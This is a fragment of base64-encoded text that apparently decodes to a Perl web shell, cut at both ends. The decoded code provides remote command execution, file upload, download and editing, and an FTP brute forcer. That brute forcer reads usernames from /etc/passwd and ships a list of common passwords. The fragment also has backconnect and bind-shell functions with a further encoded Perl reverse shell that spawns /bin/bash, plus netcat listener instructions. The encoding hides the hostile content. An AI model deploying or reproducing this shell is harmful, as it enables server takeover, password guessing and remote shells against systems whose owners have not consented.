gaXMgbm90IHByZXNlbnQKCXsKCQlpZihvcGVuKFVQTE9BREZJTEUsICI+JFRhcmdldE5hbWUiKSkKCQl7CgkJCWJpbm1vZGUoVVBMT0FERklMRSkgaWYgJFdpbk5UOwoJCQlwcmludCBVUExPQURGSUxFICRpbnsnZmlsZWRhdGEnfTsKCQkJY2xvc2UoVVBMT0FERklMRSk7CgkJCSRyZXN1bHQgLj0gIlRyYW5zZmVyZWQgJFRhcmdldEZpbGVTaXplIEJ5dGVzLjxicj4iOwoJCQkkcmVzdWx0IC49ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7CgkJfQoJCWVsc2UKCQl7CgkJCSRyZXN1bHQgLj0gIkZhaWxlZDogJCE8YnI+IjsKCQl9Cgl9CgkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJcmV0dXJuICRyZXN1bHQ7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlCiMgZmlsZW5hbWUgaXMgbm90IHNwZWNpZmllZCwgaXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQojIGZpbGUsIG90aGVyd2lzZSBpdCBkaXNwbGF5cyBhIG1lc3NhZ2UgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluawojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBEb3dubG9hZEZpbGUKewoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwgcHJpbnQgdGhlIGRvd25sb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCXJldHVybiAmUHJpbnRGaWxlRG93bmxvYWRGb3JtOwoJfQoJCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwgKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBwYXRoIGlzIGFic29sdXRlCgl7CgkJJFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOwoJfQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUKCXsKCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFyZ2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOwoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7Cgl9CgoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUKCXsKCQlyZXR1cm4gJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsKCX0KCWVsc2UgIyB3ZSBoYXZlIHRvIHNlbmQgb25seSB0aGUgbGluayBwYWdlCgl7CgkJcmV0dXJuICZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGV4ZWN1dGUgY29tbWFuZHMuIEl0IGRpc3BsYXlzIHRoZSBvdXRwdXQgb2YgdGhlCiMgY29tbWFuZCBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGFub3RoZXIgY29tbWFuZC4gVGhlIGNoYW5nZSBkaXJlY3RvcnkKIyBjb21tYW5kIGlzIGhhbmRsZWQgZGlmZmVyZW50bHkuIEluIHRoaXMgY2FzZSwgdGhlIG5ldyBkaXJlY3RvcnkgaXMgc3RvcmVkIGluCiMgYW4gaW50ZXJuYWwgdmFyaWFibGUgYW5kIGlzIHVzZWQgZWFjaCB0aW1lIGEgY29tbWFuZCBoYXMgdG8gYmUgZXhlY3V0ZWQuIFRoZQojIG91dHB1dCBvZiB0aGUgY2hhbmdlIGRpcmVjdG9yeSBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQgdG8gdGhlIHVzZXJzCiMgdGhlcmVmb3JlIGVycm9yIG1lc3NhZ2VzIGNhbm5vdCBiZSBkaXNwbGF5ZWQuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEV4ZWN1dGVDb21tYW5kCnsKCW15ICRyZXN1bHQ9IiI7CglpZigkUnVuQ29tbWFuZCA9fiBtL15ccypjZFxzKyguKykvKSAjIGl0IGlzIGEgY2hhbmdlIGRpciBjb21tYW5kCgl7CgkJIyB3ZSBjaGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQoJCSMgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkLgoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4iY2QgJDEiLiRDbWRTZXAuJENtZFB3ZDsKCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7CgkJJHJlc3VsdCAuPSAmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCgkJJHJlc3VsdCAuPSAiQ29tbWFuZDogPHJ1bj4kUnVuQ29tbWFuZCA8L3J1bj48YnI+PHRleHRhcmVhIGNvbHM9JyRjb2xzJyByb3dzPSckcm93cycgc3BlbGxjaGVjaz0nZmFsc2UnPiI7CgkJIyB4dWF0IHRob25nIHRpbiBraGkgY2h1eWVuIGRlbiAxIHRodSBtdWMgbmFvIGRvIQoJCSRSdW5Db21tYW5kPSAkV2luTlQ/ImRpciI6ImRpciAtbGlhIjsKCQkkcmVzdWx0IC49ICZSdW5DbWQ7Cgl9ZWxzaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqZWRpdFxzKyguKykvKQoJewoJCSRyZXN1bHQgLj0gICZTYXZlRmlsZUZvcm07Cgl9ZWxzZQoJewoJCSRyZXN1bHQgLj0gJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJHJlc3VsdCAuPSAiQ29tbWFuZDogPHJ1bj4kUnVuQ29tbWFuZDwvcnVuPjxicj48dGV4dGFyZWEgaWQ9J2RhdGEnIGNvbHM9JyRjb2xzJyByb3dzPSckcm93cycgc3BlbGxjaGVjaz0nZmFsc2UnPiI7CgkJJHJlc3VsdCAuPSZSdW5DbWQ7Cgl9CgkkcmVzdWx0IC49ICAiPC90ZXh0YXJlYT4iOwoJcmV0dXJuICRyZXN1bHQ7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBydW4gY29tbWFuZAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgpzdWIgUnVuQ21kCnsKCW15ICRyZXN1bHQ9IiI7CgkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuJFJ1bkNvbW1hbmQuJFJlZGlyZWN0b3I7CglpZighJFdpbk5UKQoJewoJCSRTSUd7J0FMUk0nfSA9IFwmQ29tbWFuZFRpbWVvdXQ7CgkJYWxhcm0oJENvbW1hbmRUaW1lb3V0RHVyYXRpb24pOwoJfQoJaWYoJFNob3dEeW5hbWljT3V0cHV0KSAjIHNob3cgb3V0cHV0IGFzIGl0IGlzIGdlbmVyYXRlZAoJewoJCSR8PTE7CgkJJENvbW1hbmQgLj0gIiB8IjsKCQlvcGVuKENvbW1hbmRPdXRwdXQsICRDb21tYW5kKTsKCQl3aGlsZSg8Q29tbWFuZE91dHB1dD4pCgkJewoJCQkkXyA9fiBzLyhcbnxcclxuKSQvLzsKCQkJJHJlc3VsdCAuPSAmSHRtbFNwZWNpYWxDaGFycygiJF9cbiIpOwoJCX0KCQkkfD0wOwoJfQoJZWxzZSAjIHNob3cgb3V0cHV0IGFmdGVyIGNvbW1hbmQgY29tcGxldGVzCgl7CgkJJHJlc3VsdCAuPSAmSHRtbFNwZWNpYWxDaGFycygnJENvbW1hbmQnKTsKCX0KCWlmKCEkV2luTlQpCgl7CgkJYWxhcm0oMCk7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09CiMgRm9ybSBTYXZlIEZpbGUgCiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0Kc3ViIFNhdmVGaWxlRm9ybQp7CglteSAkcmVzdWx0ID0iIjsKCXN1YnN0cigkUnVuQ29tbWFuZCwwLDUpPSIiOwoJbXkgJGZpbGU9JnRyaW0oJFJ1bkNvbW1hbmQpOwoJJHNhdmU9Jzxicj48aW5wdXQgbmFtZT0iYSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0ic2F2ZSIgY2xhc3M9InN1Ym1pdCIgPic7CgkkRmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4kUnVuQ29tbWFuZDsKCW15ICRkaXI9IjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+Ii4mQWRkTGlua0RpcigiZ3VpIikuIjwvc3Bhbj4iOwoJaWYoLXcgJEZpbGUpCgl7CgkJJHJvd3M9IjIzIgoJfWVsc2UKCXsKCQkkbXNnPSI8YnI+PGZvbnQgc3R5bGU9J2ZvbnQ6IDE1cHQgVmVyZGFuYTsgY29sb3I6IHllbGxvdzsnID4gUGVybWlzc2lvbiBkZW5pZWQhPGZvbnQ+PGJyPiI7CgkJJHJvd3M9IjIwIgoJfQoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICI8Zm9udCBjb2xvcj0nI0ZGRkZGRic+W2FkbWluXEAkU2VydmVyTmFtZSAkZGlyXVwkPC9mb250PiAiOwoJJHJlYWQ9KCRXaW5OVCk/InR5cGUiOiJsZXNzIjsKCSRSdW5Db21tYW5kID0gIiRyZWFkIFwiJFJ1bkNvbW1hbmRcIiI7CgkkcmVzdWx0IC49ICA8PEVORDsKCTxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgoKCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CgkkUHJvbXB0Cgk8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iNDAiIG5hbWU9ImMiPgoJPGlucHV0IG5hbWU9InMiIGNsYXNzPSJzdWJtaXQiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KCTxicj5Db21tYW5kOiA8cnVuPiAkUnVuQ29tbWFuZCA8L3J1bj4KCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImZpbGUiIHZhbHVlPSIkZmlsZSIgPiAkc2F2ZSA8YnI+ICRtc2cKCTxicj48dGV4dGFyZWEgaWQ9ImRhdGEiIG5hbWU9ImRhdGEiIGNvbHM9IiRjb2xzIiByb3dzPSIkcm93cyIgc3BlbGxjaGVjaz0iZmFsc2UiPgpFTkQKCQoJJHJlc3VsdCAuPSAmUnVuQ21kOwoJJHJlc3VsdCAuPSAgIjwvdGV4dGFyZWE+IjsKCSRyZXN1bHQgLj0gICI8L2Zvcm0+IjsKCXJldHVybiAkcmVzdWx0Owp9CiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0KIyBTYXZlIEZpbGUKIz09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQpzdWIgU2F2ZUZpbGUoJCkKewoJbXkgJERhdGE9IHNoaWZ0IDsKCW15ICRGaWxlPSBzaGlmdDsKCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiRGaWxlOwoJaWYob3BlbihGSUxFLCAiPiRGaWxlIikpCgl7CgkJYmlubW9kZSBGSUxFOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlyZXR1cm4gMTsKCX1lbHNlCgl7CgkJcmV0dXJuIDA7Cgl9Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIEJydXRlIEZvcmNlciBGb3JtCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEJydXRlRm9yY2VyRm9ybQp7CglteSAkcmVzdWx0PSIiOwoJJHJlc3VsdCAuPSA8PEVORDsKCjx0YWJsZT4KCjx0cj4KPHRkIGNvbHNwYW49IjIiIGFsaWduPSJjZW50ZXIiPgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyM8YnI+ClNpbXBsZSBGVFAgYnJ1dGUgZm9yY2VyPGJyPgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iYnJ1dGVmb3JjZXIiLz4KPC90ZD4KPC90cj4KPHRyPgo8dGQ+VXNlcjo8YnI+PHRleHRhcmVhIHJvd3M9IjE4IiBjb2xzPSIzMCIgbmFtZT0idXNlciI+CkVORApjaG9wKCRyZXN1bHQgLj0gYGxlc3MgL2V0Yy9wYXNzd2QgfCBjdXQgLWQ6IC1mMWApOwokcmVzdWx0IC49IDw8J0VORCc7CjwvdGV4dGFyZWE+PC90ZD4KPHRkPgoKUGFzczo8YnI+Cjx0ZXh0YXJlYSByb3dzPSIxOCIgY29scz0iMzAiIG5hbWU9InBhc3MiPjEyM3Bhc3MKMTIzIUAjCjEyM2FkbWluCjEyM2FiYwoxMjM0NTZhZG1pbgoxMjM0NTU0MzIxCjEyMzQ0MzIxCnBhc3MxMjMKYWRtaW4KYWRtaW5jcAphZG1pbmlzdHJhdG9yCm1hdGtoYXUKcGFzc2FkbWluCnBAc3N3b3JkCnBAc3N3MHJkCnBhc3N3b3JkCjEyMzQ1NgoxMjM0NTY3CjEyMzQ1Njc4CjEyMzQ1Njc4OQoxMjM0NTY3ODkwCjExMTExMQowMDAwMDAKMjIyMjIyCjMzMzMzMwo0NDQ0NDQKNTU1NTU1CjY2NjY2Ngo3Nzc3NzcKODg4ODg4Cjk5OTk5OQoxMjMxMjMKMjM0MjM0CjM0NTM0NQo0NTY0NTYKNTY3NTY3CjY3ODY3OAo3ODk3ODkKMTIzMzIxCjQ1NjY1NAo2NTQzMjEKNzY1NDMyMQo4NzY1NDMyMQo5ODc2NTQzMjEKMDk4NzY1NDMyMQphZG1pbjEyMwphZG1pbjEyMzQ1NgphYmNkZWYKYWJjYWJjCiFAIyFAIwohQCMkJV4KIUAjJCVeJiooCiFAIyQkI0AhCmFiYzEyMwphbmh5ZXVlbQppbG92ZXlvdTwvdGV4dGFyZWE+CjwvdGQ+CjwvdHI+Cjx0cj4KPHRkIGNvbHNwYW49IjIiIGFsaWduPSJjZW50ZXIiPgpTbGVlcDo8c2VsZWN0IG5hbWU9InNsZWVwIj4KCjxvcHRpb24+MDwvb3B0aW9uPgo8b3B0aW9uPjE8L29wdGlvbj4KPG9wdGlvbj4yPC9vcHRpb24+Cgo8b3B0aW9uPjM8L29wdGlvbj4KPC9zZWxlY3Q+IAo8aW5wdXQgdHlwZT0ic3VibWl0IiBjbGFzcz0ic3VibWl0IiB2YWx1ZT0iQnJ1dGUgRm9yY2VyIi8+PC90ZD48L3RyPgo8L2Zvcm0+CjwvdGFibGU+CkVORApyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgQnJ1dGUgRm9yY2VyCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEJydXRlRm9yY2VyCnsKCW15ICRyZXN1bHQ9IiI7CgkkU2VydmVyPSRFTlZ7J1NFUlZFUl9BRERSJ307CglpZigkaW57J3VzZXInfSBlcSAiIikKCXsKCQkkcmVzdWx0IC49ICZCcnV0ZUZvcmNlckZvcm07Cgl9ZWxzZQoJewoJCXVzZSBOZXQ6OkZUUDsgCgkJQHVzZXI9IHNwbGl0KC9cbi8sICRpbnsndXNlcid9KTsKCQlAcGFzcz0gc3BsaXQoL1xuLywgJGlueydwYXNzJ30pOwoJCWNob21wKEB1c2VyKTsKCQljaG9tcChAcGFzcyk7CgkJJHJlc3VsdCAuPSAiPGJyPjxicj5bK10gVHJ5aW5nIGJydXRlICRTZXJ2ZXJOYW1lPGJyPj09PT09PT09PT09PT09PT09PT09Pj4+Pj4+Pj4+Pj4+PDw8PDw8PDw8PD09PT09PT09PT09PT09PT09PT09PGJyPjxicj5cbiI7CgkJZm9yZWFjaCAkdXNlcm5hbWUgKEB1c2VyKQoJCXsKCQkJaWYoISgkdXNlcm5hbWUgZXEgIiIpKQoJCQl7CgkJCQlmb3JlYWNoICRwYXNzd29yZCAoQHBhc3MpCgkJCQl7CgkJCQkJJGZ0cCA9IE5ldDo6RlRQLT5uZXcoJFNlcnZlcikgb3IgZGllICJDb3VsZCBub3QgY29ubmVjdCB0byAkU2VydmVyTmFtZVxuIjsgCgkJCQkJaWYoJGZ0cC0+bG9naW4oIiR1c2VybmFtZSIsIiRwYXNzd29yZCIpKQoJCQkJCXsKCQkJCQkJJHJlc3VsdCAuPSAiPGEgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9J2Z0cDovLyR1c2VybmFtZTokcGFzc3dvcmRcQCRTZXJ2ZXInPlsrXSBmdHA6Ly8kdXNlcm5hbWU6JHBhc3N3b3JkXEAkU2VydmVyPC9hPjxicj5cbiI7CgkJCQkJCSRmdHAtPnF1aXQoKTsKCQkJCQkJYnJlYWs7CgkJCQkJfQoJCQkJCWlmKCEoJGlueydzbGVlcCd9IGVxICIwIikpCgkJCQkJewoJCQkJCQlzbGVlcChpbnQoJGlueydzbGVlcCd9KSk7CgkJCQkJfQoJCQkJCSRmdHAtPnF1aXQoKTsKCQkJCX0KCQkJfQoJCX0KCQkkcmVzdWx0IC49ICJcbjxicj49PT09PT09PT09Pj4+Pj4+Pj4+PiBGaW5pc2hlZCA8PDw8PDw8PDw8PT09PT09PT09PTxicj5cbiI7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgQmFja2Nvbm5lY3QgRm9ybQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBCYWNrQmluZEZvcm0KewoJcmV0dXJuIDw8RU5EOwoJPGJyPjxicj4KCgk8dGFibGU+Cgk8dHI+Cgk8Zm9ybSBuYW1lPSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KCTx0ZD5CYWNrQ29ubmVjdDogPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImJhY2tiaW5kIj48L3RkPgoJPHRkPiBIb3N0OiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iMjAiIG5hbWU9ImNsaWVudGFkZHIiIHZhbHVlPSIkRU5WeydSRU1PVEVfQUREUid9Ij4KCSBQb3J0OiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iNyIgbmFtZT0iY2xpZW50cG9ydCIgdmFsdWU9IjgwIiBvbmtleXVwPSJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnYmEnKS5pbm5lckhUTUw9dGhpcy52YWx1ZTsiPjwvdGQ+CgoJPHRkPjxpbnB1dCBuYW1lPSJzIiBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkNvbm5lY3QiPjwvdGQ+Cgk8L2Zvcm0+Cgk8L3RyPgoJPHRyPgoJPHRkIGNvbHNwYW49Mz48Zm9udCBjb2xvcj0jRkZGRkZGPlsrXSBDbGllbnQgbGlzdGVuIGJlZm9yZSBjb25uZWN0IGJhY2shCgk8YnI+WytdIFRyeSBjaGVjayB5b3VyIFBvcnQgd2l0aCA8YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3d3dy5jYW55b3VzZWVtZS5vcmcvIj5odHRwOi8vd3d3LmNhbnlvdXNlZW1lLm9yZy88L2E+Cgk8YnI+WytdIENsaWVudCBsaXN0ZW4gd2l0aCBjb21tYW5kOiA8cnVuPm5jIC12diAtbCAtcCA8c3BhbiBpZD0iYmEiPjgwPC9zcGFuPjwvcnVuPjwvZm9udD48L3RkPgoKCTwvdHI+Cgk8L3RhYmxlPgoKCTxicj48YnI+Cgk8dGFibGU+Cgk8dHI+Cgk8Zm9ybSBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KCTx0ZD5CaW5kIFBvcnQ6IDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJiYWNrYmluZCI+PC90ZD4KCgk8dGQ+IFBvcnQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIxNSIgbmFtZT0iY2xpZW50cG9ydCIgdmFsdWU9IjE0MTIiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiaScpLmlubmVySFRNTD10aGlzLnZhbHVlOyI+CgoJIFBhc3N3b3JkOiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iMTUiIG5hbWU9ImJpbmRwYXNzIiB2YWx1ZT0iVEhJRVVHSUFCVU9OIj48L3RkPgoJPHRkPjxpbnB1dCBuYW1lPSJzIiBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkJpbmQiPjwvdGQ+Cgk8L2Zvcm0+Cgk8L3RyPgoJPHRyPgoJPHRkIGNvbHNwYW49Mz48Zm9udCBjb2xvcj0jRkZGRkZGPlsrXSBDaHVjIG5hbmcgY2h1YSBkYyB0ZXN0IQoJPGJyPlsrXSBUcnkgY29tbWFuZDogPHJ1bj5uYyAkRU5WeydTRVJWRVJfQUREUid9IDxzcGFuIGlkPSJiaSI+MTQxMjwvc3Bhbj48L3J1bj48L2ZvbnQ+PC90ZD4KCgk8L3RyPgoJPC90YWJsZT48YnI+CkVORAp9CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBCYWNrY29ubmVjdCB1c2UgcGVybAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBCYWNrQmluZAp7Cgl1c2UgTUlNRTo6QmFzZTY0OwoJdXNlIFNvY2tldDsJCgkkYmFja3Blcmw9Ikl5RXZkWE55TDJKcGJpOXdaWEpzRFFwMWMyVWdTVTg2T2xOdlkydGxkRHNOQ2lSVGFHVnNiQWs5SUNJdlltbHVMMkpoYzJnaU93MEtKRUZTUjBNOVFFRlNSMVk3RFFwMWMyVWdVMjlqYTJWME93MEtkWE5sSUVacGJHVklZVzVrYkdVN0RRcHpiMk5yWlhRb1UwOURTMFZVTENCUVJsOUpUa1ZVTENCVFQwTkxYMU5VVWtWQlRTd2daMlYwY0hKdmRHOWllVzVoYldVb0luUmpjQ0lwS1NCdmNpQmthV1VnY0hKcGJuUWdJbHN0WFNCVmJtRmliR1VnZEc4Z1VtVnpiMngyWlNCSWIzTjBYRzRpT3cwS1kyOXVibVZqZENoVFQwTkxSVlFzSUhOdlkydGhaR1J5WDJsdUtDUkJVa2RXV3pGZExDQnBibVYwWDJGMGIyNG9KRUZTUjFaYk1GMHBLU2tnYjNJZ1pHbGxJSEJ5YVc1MElDSmJMVjBnVlc1aFlteGxJSFJ2SUVOdmJtNWxZM1FnU0c5emRGeHVJanNOQ25CeWFXNTBJQ0pEYjI1dVpXTjBaV1FoSWpzTkNsTlBRMHRGVkMwK1lYVjBiMlpzZFhOb0tDazdEUXB2Y0dWdUtGTlVSRWxPTENBaVBpWlRUME5MUlZRaUtUc05DbTl3Wlc0b1UxUkVUMVZVTENJK0psTlBRMHRGVkNJcE93MEtiM0JsYmloVFZFUkZVbElzSWo0bVUwOURTMFZVSWlrN0RRcHdjbWx1ZENBaUxTMDlQU0JEYjI1dVpXTjBaV1FnUW1GamEyUnZiM0lnUFQwdExTQWdYRzVjYmlJN0RRcHplWE4wWlcwb0luVnVjMlYwSUVoSlUxUkdTVXhGT3lCMWJuTmxkQ0JUUVZaRlNFbFRWQ0E3WldOb2J5QW5XeXRkSUZONWMzUmxiV2x1Wm04NklDYzdJSFZ1WVcxbElDMWhPMlZqYUc4N1pXTm9ieUFuV3l0ZElGVnpaWEpwYm1adk9pQW5PeUJwWkR0bFkyaHZPMlZqYUc4Z0oxc3JYU0JFYVhKbFkzUnZjbms2SUNjN0lIQjNaRHRsWTJodk95QmxZMmh2SUNkYksxMGdVMmhsYkd3NklDYzdKRk5vWld4c0lpazdEUXBqYkc5elpTQlRUME5MUlZRNyI7CgkkYmluZHBlcmw9Ikl5RXZkWE55TDJKcGJpOXdaWEpzRFFwMWMyVWdVMjlqYTJWME93MEtKRUZTUjBNOVFFRlNSMVk3RFFva2NHOXlkQWs5SUNSQlVrZFdXekJkT3cwS0pIQnliM1J2Q1QwZ1oyVjBjSEp2ZEc5aWVXNWhiV1VvSjNSamNDY3BPdzBLSkZOb1pXeHNDVDBnSWk5aWFXNHZZbUZ6YUNJN0RRcHpiMk5yWlhRb1UwVlNWa1ZTTENCUVJsOUpUa1ZVTENCVFQwTkxYMU5VVWtWQlRTd2dKSEJ5YjNSdktXOXlJR1JwWlNBaWMyOWphMlYwT2lRaElqc05Dbk5sZEhOdlkydHZjSFFvVTBWU1ZrVlNMQ0JUVDB4ZlUwOURTMFZVTENCVFQxOVNSVlZUUlVGRVJGSXNJSEJoWTJzb0ltd2lMQ0F4S1NsdmNpQmthV1VnSW5ObGRITnZZMnR2Y0hRNklDUWhJanNOQ21KcGJtUW9VMFZTVmtWU0xDQnpiMk5yWVdSa2NsOXBiaWdrY0c5eWRDd2dTVTVCUkVSU1gwRk9XU2twYjNJZ1pHbGxJQ0ppYVc1a09pQWtJU0k3RFFwc2FYTjBaVzRvVTBWU1ZrVlNMQ0JUVDAxQldFTlBUazRwQ1FsdmNpQmthV1VnSW14cGMzUmxiam9nSkNFaU93MEtabTl5S0RzZ0pIQmhaR1J5SUQwZ1lXTmpaWEIwS0VOTVNVVk9WQ3dnVTBWU1ZrVlNLVHNnWTJ4dmMyVWdRMHhKUlU1VUtRMEtldzBLQ1c5d1pXNG9VMVJFU1U0c0lDSStKa05NU1VWT1ZDSXBPdzBLQ1c5d1pXNG9VMVJFVDFWVUxDQWlQaVpEVEVsRlRsUWlLVHNOQ2dsdmNHVnVLRk5VUkVWU1Vpd2dJajRtUTB4SlJVNVVJaWs3RFFvSmMzbHpkR1Z0S0NKMWJuTmxkQ0JJU1ZOVVJrbE1SVHNnZFc1elpYUWdVMEZXUlVoSlUxUWdPMlZqYUc4Z0oxc3JYU